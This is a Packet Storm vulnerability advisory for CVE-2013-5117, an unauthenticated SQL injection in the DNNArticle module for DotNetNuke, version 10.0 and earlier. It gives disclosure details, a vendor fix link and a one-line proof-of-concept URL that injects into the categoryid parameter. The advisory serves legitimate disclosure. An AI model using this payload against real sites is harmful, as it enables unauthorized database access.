DotNetNuke DNNArticle module versions 10.0 and below suffer from a remote SQL injection vulnerability.
3418ca4d1ae20f2fa6d4bc50f7515ed9bbbff0fa1ebe71846e7fb3de94fd2c36Title: DotNetNuke (DNNArticle Module) SQL Injection Vulnerability
References: CVE-2013-5117
Discovered by: Sajjad Pourali
Vendor http://www.zldnn.com/ , http://www.dnnarticle.com/
Vendor advisory: http://www.zldnn.com/Support/tabid/643/ctl/RecordList/mid/1691/ItemID/2979/Default.aspx (Ticket iD:#2979)
Vendor contact: 2013-8-14
Solution: http://www.zldnn.com/Support/tabid/643/ctl/RecordList/mid/1691/ItemID/2979/Default.aspx (Ticket iD:#2979)
Remote: yes
Authentication required: no
User interaction required: no
Impact: High
Affected:
- DNNArticle 10.0 and earlier
---
PoC:
http://www.vulnerable.com/desktopmodules/dnnarticle/dnnarticlerss.aspx?moduleid=0&categoryid=1+or+1=@@version
---
+ Sajjad Pourali
+ http://www.securation.com/
+ http://www.cert.um.ac.ir/
+ Contact: sajjad[at]securation.com
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed